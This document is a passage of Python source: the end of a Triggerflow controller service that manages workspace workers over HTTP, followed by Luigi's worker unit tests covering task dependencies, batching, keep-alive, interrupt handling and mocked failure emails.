if not trigger_storage.workspace_exists(workspace):
return jsonify('Workspace {} does not exists in the database'.format(workspace)), 400
if workspace in monitors:
return jsonify('Workspace {} is already created'.format(workspace)), 400
logging.info('New request to create workspace {}'.format(workspace))
start_worker_monitor(workspace)
return jsonify('Created workspace {}'.format(workspace)), 201
def start_worker_monitor(workspace):
"""
Auxiliary method to monitor a worker triggers
"""
global monitors
logging.info('Starting {} workspace monitor'.format(workspace))
def monitor():
if len(trigger_storage.get(workspace, 'triggers')) > 1:
start_worker(workspace)
while True:
if trigger_storage.new_trigger(workspace):
start_worker(workspace)
else:
break
monitors[workspace] = threading.Thread(target=monitor, daemon=True)
monitors[workspace].start()
def start_worker(workspace):
"""
Auxiliary method to start a worker
"""
global workers
if workspace not in workers or not workers[workspace].is_alive():
logging.info('Starting {} workspace'.format(workspace))
workers[workspace] = Worker(workspace, config_map)
workers[workspace].start()
@app.route('/workspace/<workspace>', methods=['DELETE'])
def delete_worker(workspace):
logging.info('New request to delete workspace {}'.format(workspace))
global workers, monitors
if workspace not in monitors and workspace not in workers:
return jsonify('Workspace {} is not active'.format(workspace)), 400
else:
if workspace in workers:
if workers[workspace].is_alive():
workers[workspace].stop_worker()
del workers[workspace]
del monitors[workspace]
return jsonify('Workspace {} deleted'.format(workspace)), 200
@app.route('/workspace/<workspace>/timeout', methods=['POST'])
def timeout(workspace):
logging.info('New request to add timeout'.format(workspace))
timeout_data = request.get_json(force=True, silent=True)
if timeout_data is None:
return jsonify('Parameters error'), 400
def _timeout(timeout_data):
logging.debug('Starting event source instance')
logging.debug(timeout_data)
event_source_class = getattr(eventsources, '{}'.format(timeout_data['event_source']['class']))
event_source = event_source_class(**timeout_data['event_source']['parameters'])
time.sleep(timeout_data['seconds'])
timeout_data['event']['type'] = 'event.triggerflow.timeout'
event_source.publish_cloudevent(timeout_data['event'])
logging.debug('Event {} sent after {} secodns'.format(timeout_data['event'], timeout_data['seconds']))
timeout_thread = threading.Thread(target=_timeout, args=(timeout_data.copy(),))
timeout_thread.start()
logging.debug('Timeout set for workspace {}'.format(workspace))
return jsonify('Timeout set'.format(workspace)), 201
def main():
global config_map, trigger_storage, workers
# Create process group
os.setpgrp()
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
component = os.getenv('INSTANCE', 'triggerflow-controller')
# Make sure we log to the console
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('[%(asctime)s.%(msecs)03dZ][%(levelname)s][triggerflow] %(message)s',
datefmt="%Y-%m-%dT%H:%M:%S")
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logging.info('Starting Triggerflow Controller')
# also log to file if /logs is present
if os.path.isdir('/logs'):
fh = logging.FileHandler('/logs/{}_logs.log'.format(component))
fh.setFormatter(formatter)
logger.addHandler(fh)
logging.info('Loading private credentials')
with open(CONFIG_MAP_PATH, 'r') as config_file:
config_map = yaml.safe_load(config_file)
# Instantiate trigger storage client
logging.info('Creating trigger storage client')
backend = config_map['trigger_storage']['backend']
trigger_storage_class = getattr(storage, backend.capitalize() + 'TriggerStorage')
trigger_storage = trigger_storage_class(**config_map['trigger_storage']['parameters'])
port = int(os.getenv('PORT', 5000))
server = WSGIServer(('', port), app, log=logging.getLogger())
logging.info('Triggerflow service started on port {}'.format(port))
workspaces = trigger_storage.list_workspaces()
for wsp in workspaces:
start_worker(wsp)
try:
server.serve_forever()
except KeyboardInterrupt:
print('exiting...')
finally:
# Kill all child processes
os.killpg(0, signal.SIGKILL)
if __name__ == '__main__':
main()
|
worker_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import functools
import logging
import os
import shutil
import signal
import tempfile
import threading
import time
import psutil
from helpers import (unittest, with_config, skipOnTravis, LuigiTestCase,
temporary_unloaded_module)
import luigi.notifications
import luigi.task_register
import luigi.worker
import mock
from luigi import ExternalTask, RemoteScheduler, Task, Event
from luigi.mock import MockTarget, MockFileSystem
from luigi.scheduler import Scheduler
from luigi.worker import Worker
from luigi.rpc import RPCError
from luigi import six
from luigi.cmdline import luigi_run
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self)
self.has_run = True
class DynamicDummyTask(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.p)
def run(self):
with self.output().open('w') as f:
f.write('Done!')
time.sleep(0.5) # so we can benchmark & see if parallelization works
class DynamicDummyTaskWithNamespace(DynamicDummyTask):
task_namespace = 'banana'
class DynamicRequires(Task):
p = luigi.Parameter()
use_banana_task = luigi.BoolParameter(default=False)
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'parent'))
def run(self):
if self.use_banana_task:
task_cls = DynamicDummyTaskWithNamespace
else:
task_cls = DynamicDummyTask
dummy_targets = yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5)]
dummy_targets += yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5, 7)]
with self.output().open('w') as f:
for i, d in enumerate(dummy_targets):
for line in d.open('r'):
print('%d: %s' % (i, line.strip()), file=f)
class DynamicRequiresOtherModule(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'baz'))
def run(self):
import other_module
other_target_foo = yield other_module.OtherModuleTask(os.path.join(self.p, 'foo')) # NOQA
other_target_bar = yield other_module.OtherModuleTask(os.path.join(self.p, 'bar')) # NOQA
with self.output().open('w') as f:
f.write('Done!')
class DummyErrorTask(Task):
retry_index = 0
def run(self):
self.retry_index += 1
raise Exception("Retry index is %s for %s" % (self.retry_index, self.task_family))
class WorkerTest(LuigiTestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.time = time.time
with Worker(scheduler=self.sch, worker_id='X') as w, Worker(scheduler=self.sch, worker_id='Y') as w2:
self.w = w
self.w2 = w2
super(WorkerTest, self).run(result)
if time.time != self.time:
time.time = self.time
def setTime(self, t):
time.time = lambda: t
def test_dep(self):
class A(Task):
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertTrue(a.has_run)
self.assertTrue(b.has_run)
def test_external_dep(self):
class A(ExternalTask):
def complete(self):
return False
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(A):
def requires(self):
return luigi.task.externalize(a)
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_legacy_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
a.run = NotImplemented
class B(A):
def requires(self):
return a
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_type_error_in_tracking_run_deprecated(self):
class A(Task):
num_runs = 0
def complete(self):
return False
def run(self, tracking_url_callback=None):
self.num_runs += 1
raise TypeError('bad type')
a = A()
self.assertTrue(self.w.add(a))
self.assertFalse(self.w.run())
# Should only run and fail once, not retry because of the type error
self.assertEqual(1, a.num_runs)
def test_tracking_url(self):
tracking_url = 'http://test_url.com/'
class A(Task):
has_run = False
def complete(self):
return self.has_run
def run(self):
self.set_tracking_url(tracking_url)
self.has_run = True
a = A()
self.assertTrue(self.w.add(a))
self.assertTrue(self.w.run())
tasks = self.sch.task_list('DONE', '')
self.assertEqual(1, len(tasks))
self.assertEqual(tracking_url, tasks[a.task_id]['tracking_url'])
def test_fail(self):
class CustomException(BaseException):
def __init__(self, msg):
self.msg = msg
class A(Task):
def run(self):
self.has_run = True
raise CustomException('bad things')
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertFalse(self.w.run())
self.assertTrue(a.has_run)
self.assertFalse(b.has_run)
def test_unknown_dep(self):
# see related test_remove_dep test (grep for it)
class A(ExternalTask):
def complete(self):
return False
class C(Task):
def complete(self):
return True
def get_b(dep):
class B(Task):
def requires(self):
return dep
def run(self):
self.has_run = True
def complete(self):
return False
b = B()
b.has_run = False
return b
b_a = get_b(A())
b_c = get_b(C())
self.assertTrue(self.w.add(b_a))
# So now another worker goes in and schedules C -> B
# This should remove the dep A -> B but will screw up the first worker
self.assertTrue(self.w2.add(b_c))
self.assertFalse(self.w.run()) # should not run anything - the worker should detect that A is broken
self.assertFalse(b_a.has_run)
# not sure what should happen??
# self.w2.run() # should run B since C is fulfilled
# self.assertTrue(b_c.has_run)
def test_unfulfilled_dep(self):
class A(Task):
def complete(self):
return self.done
def run(self):
self.done = True
def get_b(a):
class B(A):
def requires(self):
return a
b = B()
b.done = False
a.done = True
return b
a = A()
b = get_b(a)
self.assertTrue(self.w.add(b))
a.done = False
self.w.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_gets_missed_work(self):
class A(Task):
done = False
def complete(self):
return self.done
def run(self):
self.done = True
a = A()
self.assertTrue(self.w.add(a))
# simulate a missed get_work response
self.assertEqual(a.task_id, self.sch.get_work(worker='X')['task_id'])
self.assertTrue(self.w.run())
self.assertTrue(a.complete())
def test_avoid_infinite_reschedule(self):
class A(Task):
def complete(self):
return False
class B(Task):
def complete(self):
return False
def requires(self):
return A()
self.assertTrue(self.w.add(B()))
self.assertFalse(self.w.run())
def test_fails_registering_signal(self):
with mock.patch('luigi.worker.signal', spec=['signal']):
# mock will raise an attribute error getting signal.SIGUSR1
Worker()
def test_allow_reschedule_with_many_missing_deps(self):
class A(Task):
""" Task that must run twice to succeed """
i = luigi.IntParameter()
runs = 0
def complete(self):
return self.runs >= 2
def run(self):
self.runs += 1
class B(Task):
done = False
def requires(self):
return map(A, range(20))
def complete(self):
return self.done
def run(self):
self.done = True
b = B()
w = Worker(scheduler=self.sch, worker_id='X', max_reschedules=1)
self.assertTrue(w.add(b))
self.assertFalse(w.run())
# For b to be done, we must have rescheduled its dependencies to run them twice
self.assertTrue(b.complete())
self.assertTrue(all(a.complete() for a in b.deps()))
def test_interleaved_workers(self):
class A(DummyTask):
pass
a = A()
class B(DummyTask):
def requires(self):
return a
ExternalB = luigi.task.externalize(B)
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(eb))
logging.debug("RUNNING BROKEN WORKER")
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
logging.debug("RUNNING FUNCTIONAL WORKER")
self.assertTrue(w.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_interleaved_workers2(self):
# two tasks without dependencies, one external, one not
class B(DummyTask):
pass
ExternalB = luigi.task.externalize(B)
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w2.add(eb))
self.assertTrue(w.add(b))
self.assertTrue(w2.run())
self.assertFalse(b.complete())
self.assertTrue(w.run())
self.assertTrue(b.complete())
def test_interleaved_workers3(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w.add(a))
self.assertTrue(w2.add(b))
threading.Thread(target=w.run).start()
self.assertTrue(w2.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_die_for_non_unique_pending(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(b))
self.assertEqual(w._get_work()[0], a.task_id)
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
def test_complete_exception(self):
"Tests that a task is still scheduled if its sister task crashes in the complete() method"
class A(DummyTask):
def complete(self):
raise Exception("doh")
a = A()
class C(DummyTask):
pass
c = C()
class B(DummyTask):
def requires(self):
return a, c
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertFalse(a.has_run)
def test_requires_exception(self):
class A(DummyTask):
def requires(self):
raise Exception("doh")
a = A()
class D(DummyTask):
pass
d = D()
class C(DummyTask):
def requires(self):
return d
c = C()
class B(DummyTask):
def requires(self):
return c, a
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertTrue(d.has_run)
self.assertFalse(a.has_run)
def test_run_csv_batch_job(self):
completed = set()
class CsvBatchJob(luigi.Task):
values = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
def run(self):
completed.update(self.values.split(','))
self.has_run = True
def complete(self):
return all(value in completed for value in self.values.split(','))
tasks = [CsvBatchJob(str(i)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertFalse(task.has_run)
def test_run_max_batch_job(self):
completed = set()
class MaxBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return any(self.value <= ran for ran in completed)
tasks = [MaxBatchJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
def test_run_batch_job_unbatched(self):
completed = set()
class MaxNonBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
batchable = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return self.value in completed
tasks = [MaxNonBatchJob((i,)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertTrue(task.has_run)
def test_run_batch_job_limit_batch_size(self):
completed = set()
runs = []
class CsvLimitedBatchJob(luigi.Task):
value = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
max_batch_size = 4
def run(self):
completed.update(self.value.split(','))
runs.append(self)
def complete(self):
return all(value in completed for value in self.value.split(','))
tasks = [CsvLimitedBatchJob(str(i)) for i in range(11)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertEqual(3, len(runs))
def test_fail_max_batch_job(self):
class MaxBatchFailJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
self.has_run = True
assert False
def complete(self):
return False
tasks = [MaxBatchFailJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
for task in tasks:
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
self.assertEqual({task.task_id for task in tasks}, set(self.sch.task_list('FAILED', '')))
def test_gracefully_handle_batch_method_failure(self):
class BadBatchMethodTask(DummyTask):
priority = 10
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
bad_tasks = [BadBatchMethodTask(i) for i in range(5)]
good_tasks = [DummyTask()]
all_tasks = good_tasks + bad_tasks
self.assertFalse(any(task.complete() for task in all_tasks))
worker = Worker(scheduler=Scheduler(retry_count=1), keep_alive=True)
for task in all_tasks:
self.assertTrue(worker.add(task))
self.assertFalse(worker.run())
self.assertFalse(any(task.complete() for task in bad_tasks))
# we only get to run the good task if the bad task failures were handled gracefully
self.assertTrue(all(task.complete() for task in good_tasks))
def test_post_error_message_for_failed_batch_methods(self):
class BadBatchMethodTask(DummyTask):
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
tasks = [BadBatchMethodTask(1), BadBatchMethodTask(2)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
failed_ids = set(self.sch.task_list('FAILED', ''))
self.assertEqual({task.task_id for task in tasks}, failed_ids)
self.assertTrue(all(self.sch.fetch_error(task_id)['error'] for task_id in failed_ids))
class WorkerKeepAliveTests(LuigiTestCase):
def setUp(self):
self.sch = Scheduler()
super(WorkerKeepAliveTests, self).setUp()
def _worker_keep_alive_test(self, first_should_live, second_should_live, task_status=None, **worker_args):
worker_args.update({
'scheduler': self.sch,
'worker_processes': 0,
'wait_interval': 0.01,
'wait_jitter': 0.0,
})
w1 = Worker(worker_id='w1', **worker_args)
w2 = Worker(worker_id='w2', **worker_args)
with w1 as worker1, w2 as worker2:
worker1.add(DummyTask())
t1 = threading.Thread(target=worker1.run)
t1.start()
worker2.add(DummyTask())
t2 = threading.Thread(target=worker2.run)
t2.start()
if task_status:
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status=task_status)
# allow workers to run their get work loops a few times
time.sleep(0.1)
try:
self.assertEqual(first_should_live, t1.isAlive())
self.assertEqual(second_should_live, t2.isAlive())
finally:
# mark the task done so the worker threads will die
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status='DONE')
t1.join()
t2.join()
def test_no_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
)
def test_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
)
def test_keep_alive_count_uniques(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
count_uniques=True,
)
def test_keep_alive_count_last_scheduled(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=True,
keep_alive=True,
count_last_scheduled=True,
)
def test_keep_alive_through_failure(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
task_status='FAILED',
)
def test_do_not_keep_alive_through_disable(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
task_status='DISABLED',
)
class WorkerInterruptedTest(unittest.TestCase):
def setUp(self):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
requiring_sigusr = unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
'signal.SIGUSR1 not found on this system')
def _test_stop_getting_new_work(self, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
worker.handle_interrupt(signal.SIGUSR1, None)
worker.run()
self.assertFalse(d.complete())
@requiring_sigusr
def test_stop_getting_new_work(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch))
@requiring_sigusr
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=False, assistant=True))
@requiring_sigusr
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=True, assistant=True))
def test_existence_of_disabling_option(self):
# any code equivalent of `os.kill(os.getpid(), signal.SIGUSR1)`
# seem to give some sort of a "InvocationError"
Worker(no_install_shutdown_handler=True)
@with_config({"worker": {"no_install_shutdown_handler": "True"}})
def test_can_run_luigi_in_thread(self):
class A(DummyTask):
pass
task = A()
# Note that ``signal.signal(signal.SIGUSR1, fn)`` can only be called in the main thread.
# So if we do not disable the shutdown handler, this would fail.
t = threading.Thread(target=lambda: luigi.build([task], local_scheduler=True))
t.start()
t.join()
self.assertTrue(task.complete())
class WorkerDisabledTest(LuigiTestCase):
def make_sch(self):
return Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
def _test_stop_getting_new_work_build(self, sch, worker):
"""
I got motivated to create this test case when I saw that the
execution_summary crashed after my first attemted solution.
"""
class KillWorkerTask(luigi.Task):
did_actually_run = False
def run(self):
sch.disable_worker('my_worker_id')
KillWorkerTask.did_actually_run = True
class Factory(object):
def create_local_scheduler(self, *args, **kwargs):
return sch
def create_worker(self, *args, **kwargs):
return worker
luigi.build([KillWorkerTask()], worker_scheduler_factory=Factory(), local_scheduler=True)
self.assertTrue(KillWorkerTask.did_actually_run)
def _test_stop_getting_new_work_manual(self, sch, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
sch.disable_worker('my_worker_id')
worker.run() # Note: Test could fail by hanging on this line
self.assertFalse(d.complete())
def _test_stop_getting_new_work(self, **worker_kwargs):
worker_kwargs['worker_id'] = 'my_worker_id'
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_manual(sch, Worker(**worker_kwargs))
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_build(sch, Worker(**worker_kwargs))
def test_stop_getting_new_work_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=False)
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(keep_alive=False, assistant=True)
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=True)
class DynamicDependenciesTest(unittest.TestCase):
n_workers = 1
timeout = float('inf')
def setUp(self):
self.p = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.p)
def test_dynamic_dependencies(self, use_banana_task=False):
t0 = time.time()
t = DynamicRequires(p=self.p, use_banana_task=use_banana_task)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
# loop through output and verify
with t.output().open('r') as f:
for i in range(7):
self.assertEqual(f.readline().strip(), '%d: Done!' % i)
self.assertTrue(time.time() - t0 < self.timeout)
def test_dynamic_dependencies_with_namespace(self):
self.test_dynamic_dependencies(use_banana_task=True)
def test_dynamic_dependencies_other_module(self):
t = DynamicRequiresOtherModule(p=self.p)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
class DynamicDependenciesWithMultipleWorkersTest(DynamicDependenciesTest):
n_workers = 100
timeout = 3.0 # We run 7 tasks that take 0.5s each so it should take less than 3.5s
class WorkerPingThreadTests(unittest.TestCase):
def test_ping_retry(self):
""" Worker ping fails once. Ping continues to try to connect to scheduler
Kind of ugly since it uses actual timing with sleep to test the thread
"""
sch = Scheduler(
retry_delay=100,
remove_delay=1000,
worker_disconnect_delay=10,
)
self._total_pings = 0 # class var so it can be accessed from fail_ping
def fail_ping(worker):
# this will be called from within keep-alive thread...
self._total_pings += 1
raise Exception("Some random exception")
sch.ping = fail_ping
with Worker(
scheduler=sch,
worker_id="foo",
ping_interval=0.01 # very short between pings to make test fast
):
# let the keep-alive thread run for a bit...
time.sleep(0.1) # yes, this is ugly but it's exactly what we need to test
self.assertTrue(
self._total_pings > 1,
msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
)
def test_ping_thread_shutdown(self):
with Worker(ping_interval=0.01) as w:
self.assertTrue(w._keep_alive_thread.is_alive())
self.assertFalse(w._keep_alive_thread.is_alive())
def email_patch(test_func, email_config=None):
EMAIL_CONFIG = {"core": {"error-email": "not-a-real-email-address-for-test-only"}, "email": {"force-send": "true"}}
if email_config is not None:
EMAIL_CONFIG.update(email_config)
emails = []
def mock_send_email(sender, recipients, msg):
emails.append(msg)
@with_config(EMAIL_CONFIG)
@functools.wraps(test_func)
@mock.patch('smtplib.SMTP')
def run_test(self, smtp):
smtp().sendmail.side_effect = mock_send_email
test_func(self, emails)
return run_test
def custom_email_patch(config):
return functools.partial(email_patch, email_config=config)
class WorkerEmailTest(LuigiTestCase):
def run(self, result=None):
super(WorkerEmailTest, self).setUp()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as self.worker:
super(WorkerEmailTest, self).run(result)
@email_patch
def test_connection_error(self, emails):
sch = RemoteScheduler('http://tld.invalid:1337', connect_timeout=1)
self.waits = 0
def dummy_wait():
self.waits += 1
sch._wait = dummy_wait
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
with Worker(scheduler=sch) as worker:
try:
worker.add(a)
except RPCError:
self.assertEqual(self.waits, 2) # should attempt to add it 3 times
self.assertNotEqual(emails, [])
self.assertTrue(emails[0].find("Luigi: Framework error while scheduling %s" % (a,)) != -1)
else:
self.fail()
@email_patch
def test_complete_error(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_error_email_batch(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_error_email_batch_to_owner(self, emails):
class A(DummyTask):
owner_email = 'a_owner@test.com'
def complete(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue(any(
"1 scheduling failure" in email and 'a_owner@test.com' in email
for email in emails))
@email_patch
def test_requires_error(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_requires_error_email_batch(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@email_patch
def test_complete_return_value(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_return_value_email_batch(self, emails):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@email_patch
def test_run_error(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
a = A()
luigi.build([a], workers=1, local_scheduler=True)
self.assertEqual(1, len(emails))
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_email_batch(self, emails):
class A(luigi.Task):
owner_email = ['a@test.com', 'b@test.com']
def run(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
worker.add(A())
